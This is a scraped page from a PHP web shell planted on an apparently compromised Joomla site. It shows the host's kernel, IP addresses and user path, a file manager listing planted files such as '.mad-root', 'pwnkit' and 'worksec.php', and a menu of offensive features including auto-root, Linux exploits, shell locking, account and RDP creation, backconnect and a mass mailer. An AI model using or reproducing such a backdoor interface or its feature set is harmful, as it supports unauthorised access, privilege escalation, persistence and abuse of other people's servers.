Linux webm002.cluster120.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.120.20.2 | : 216.73.216.49
Cant Read [ /etc/named.conf ]
8.5.7
verseaumee
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
verseaumee /
ptitsanes /
modules /
mod_whosonline /
[ HOME SHELL ]
Name
Size
Permission
Action
tmpl
[ DIR ]
drwxr-xr-x
.htaccess
420
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
helper.php
2.62
KB
-rw-r--r--
mod_whosonline.php
778
B
-rw-r--r--
mod_whosonline.xml
2.55
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
worksec.php
1.06
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : mod_whosonline.php
<?php /** * @package Joomla.Site * @subpackage mod_whosonline * * @copyright (C) 2005 Open Source Matters, Inc. <https://www.joomla.org> * @license GNU General Public License version 2 or later; see LICENSE.txt */ defined('_JEXEC') or die; // Include the whosonline functions only once JLoader::register('ModWhosonlineHelper', __DIR__ . '/helper.php'); $showmode = $params->get('showmode', 0); if ($showmode == 0 || $showmode == 2) { $count = ModWhosonlineHelper::getOnlineCount(); } if ($showmode > 0) { $names = ModWhosonlineHelper::getOnlineUserNames($params); } $moduleclass_sfx = htmlspecialchars($params->get('moduleclass_sfx', ''), ENT_COMPAT, 'UTF-8'); require JModuleHelper::getLayoutPath('mod_whosonline', $params->get('layout', 'default'));
Close